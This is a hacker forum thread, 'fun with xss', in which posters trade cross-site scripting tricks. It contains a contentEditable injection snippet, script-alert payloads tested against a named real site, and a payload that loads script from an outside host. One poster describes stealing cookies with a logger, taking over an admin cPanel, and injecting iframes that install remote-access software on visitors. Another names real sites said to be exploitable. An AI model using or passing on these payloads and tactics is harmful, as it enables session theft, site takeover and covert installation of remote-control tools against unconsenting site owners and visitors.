fun with xss
Here is a little fun you can have with xss. You can use javascript code: javascript: document.body.contentEditable ='true'; document.designMode='on'; void 0 (take out the space between javascript: documnet *damn smileys)
inside your xss statement. Anyone who visits the page you just xss'ed can now edit the page to there liking. *I know this is old code, and i know that lots of people know about it, but i have never heard of anyone injecting it into an xss attack. (have fun)
This is a pretty good idea.
anyways I was doing some xss testing and came across this…
http://www.estellegetty.com/fan_list/page.php?action=%3Cscript%3Ealert(%22yours31f%22);%3C/script%3E
I thought it was pretty funny.
Best fun ive ever had with XSS was iFrames. The XSS allowed me to chuck a cookie logger on the page. Then once I had admin cPanel I chucked iFrames all over it : ] If a site already has some activex on it then your in luck. Create an iFrame linking to you logmein vpn install software page. Then upon visiting a vnc is installed for you. Wow wasnt that easy. Ill draw up some code for it today. I got work at computer help now :ninja:
yours3lf, if you're talking about xssing the site you just posted, I don't think that is going to work (at least from ?page.php=xsshere). It looks like they are using switch case and the default case displays that error page. Good luck though Edit: i lied about the switch case. That is the default error message, but you still won't be able to xss it since it wont return the values back onto the page.
yours31f wrote: right now im just doing this
"> <script>alert("xssed");</script>
"</textarea> <script>alert("xssed");</script>
"><script src="http://yours31f.ulmb.com/xss.html"></script>
Go back to the cheat sheet and get some more ideas.
Most of the sites hosted by the Russian Information Network are pretty exploitable to XSS. There are quite a few of them, and even search.rin.ru, their main search engine, is exploitable. This is good for experimentally learning more about the exploit and how it can used for things other than creating alert boxes and stealing cookies. XSS is a powerful exploit that is often misused, attempt not to add on to the misuse.
Well you must not know much, because what you posted is a full fledged URL. Your last post was both pointless and incorrect. Make use of the time you spend writing pointless posts and read.
http://www.mattcutts.com/blog/seo-glossary-url-definitions/
Seriously, if only you'd use Google more often, you wouldn't be flamed as often.
HZ wrote: Well you must not know much, because what you posted is a full fledged URL. Your last post was both pointless and incorrect. Make use of the time you spend writing pointless posts and read.
http://www.mattcutts.com/blog/seo-glossary-url-definitions/
Seriously, if only you'd use Google more often, you wouldn't be flamed as often.
I think he was speaking of the fact that the URL he posted wasn't vulnerable.
Please, as a (new) member of this community, don't be so quick to flame other members of the community